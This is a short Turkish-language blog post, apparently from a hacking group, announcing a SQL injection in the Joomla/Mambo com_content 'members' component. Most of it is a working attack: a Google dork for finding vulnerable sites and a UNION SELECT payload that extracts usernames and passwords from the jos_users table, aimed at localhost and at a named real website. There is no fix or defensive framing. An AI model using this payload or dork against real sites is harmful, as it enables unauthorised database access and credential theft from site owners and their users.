12 Aralık 2009 Cumartesi

Joomla / Mambo com_content members SQL İNJECTİON

Acıgı Bulan : ByEge
Acık Türü : SQL İNJECTİON..
Site : h4ckz.com
Blog : byege.blogspot.com

google dork : inurl:index.php?option=com_content  inurl:show=members

http:/localhost/index.php?option=com_content&task=view&id=4&Itemid=50&show=members&pid=13&cid=


http:/localhost/index.php?option=com_content&task=view&id=4&Itemid=50&show=members&pid=13&cid=-112 UNION SELECT 1,concat(username,0x3D,password),3,4,5,6,7,8,9 from jos_users


 http://www.boincitaly.org/index.php?option=com_content&task=view&id=4&Itemid=50&show=members&pid=13&cid=-112 UNION SELECT 1,concat(username,0x3D,password),3,4,5,6,7,8,9 from jos_users

Hiç yorum yok :

Yorum Gönderme